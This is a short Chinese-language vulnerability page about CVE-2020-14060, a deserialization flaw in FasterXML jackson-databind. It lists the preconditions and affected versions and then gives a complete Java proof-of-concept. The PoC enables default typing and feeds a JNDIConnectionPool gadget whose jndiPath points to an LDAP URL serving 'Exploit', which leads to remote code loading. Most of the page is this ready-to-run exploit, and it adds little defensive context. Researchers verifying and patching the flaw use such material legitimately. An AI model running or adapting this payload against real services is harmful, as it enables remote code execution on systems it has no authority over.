# CVE-2020-14060 FasterXML jackson-databind 反序列化漏洞/zh-cn
==利用条件==
开启enableDefaultTyping()
使用了org.apache.drill.exec:drill-jdbc-all第三方依赖
==影响版本==
jackson-databind before 2.9.10.4 jackson-databind before 2.8.11.6 jackson-databind before 2.7.9.7
==POC==
package com.jacksonTest; import com.fasterxml.jackson.databind.ObjectMapper; import java.io.IOException; public class Poc { public static void main(String[] args) throws Exception { ObjectMapper mapper = new ObjectMapper(); mapper.enableDefaultTyping(); String payload = "[\"oadd.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"ldap://127.0.0.1:1099/Exploit\"}]"; try { Object obj = mapper.readValue(payload, Object.class); mapper.writeValueAsString(obj); } catch (IOException e) { e.printStackTrace(); } } }
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容